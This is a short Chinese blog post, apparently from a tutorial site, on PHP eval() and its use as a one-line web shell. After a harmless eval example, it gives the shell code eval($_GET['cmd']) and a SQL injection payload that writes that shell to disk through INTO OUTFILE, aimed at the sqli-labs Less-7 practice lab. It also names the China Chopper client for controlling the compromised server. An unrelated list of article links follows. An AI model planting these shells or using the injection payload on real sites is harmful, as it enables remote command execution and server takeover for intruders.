PHP 一句话木马
2024-08-28 12:20:23
eval 函数
eval() 函数把字符串按照 PHP 代码来计算
该字符串必须是合法的 PHP 代码,且必须以分号结尾
如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false
eval 函数的一般用法
eval() 函数用于简单的文本合并
<?php
$string='cup';
$name='coffee';
$str='This is a $string with my $name in it.';
echo $str."\n";
eval("\$str=\"$str\";");
echo $str."\n";
?>
以上例程会输出
eval() 函数的特殊用法
用于构造一句话木马
eval($_GET["cmd"]);
两种方式
通过数据库写马
环境:sql_labs Less-7
写入一句话木马
union select 1,2,'<?php eval($_POST["cmd"]);?>' into outfile 'd:/wampserver/wamp64/www/sqli/sqli/Less-7/twx.txt'%23
使用中国菜刀进行连接
可以访问并操作服务器文件
通过PHP 文件写马
<?php
eval($_GET["cmd"]);
?>
访问PHP 文件,查看phpinfo()
最新文章
- zookeeper Eclipse 开发环境搭建及简单示例
- Matlab中cell存储为txt
- Java日期转换SimpleDateFormat格式大全(转)
- URAL 1146 Maximum Sum & HDU 1081 To The Max (DP)
- Eclipse自动生成作者、日期注释等功能设置(转载)
- sql: 查询,select
- 以域管理账户连接到TFS或git时,设置IE允许Cookies
- php学习笔记——文件(1)
- 在TFS中通过程序动态创建Bug并感知Bug解决状态
- mac下安装ELK
- samba 基本配置及自定义控制
- SQL实现如何计算项目进度总共天数情况、已经施工天数情况、以及施工进度百分比
- net.js
- js 发送http请求
- SQL中常用系统函数
- 用C语言解决python多线程中的GIL问题
- Unity Profiler GPU Usage(GPU使用情况)
- 解释JS变量作用域的范例
- 洛谷 P4128: bzoj 1815: [SHOI2006]有色图
- Java基础86 MySQL数据库基础知识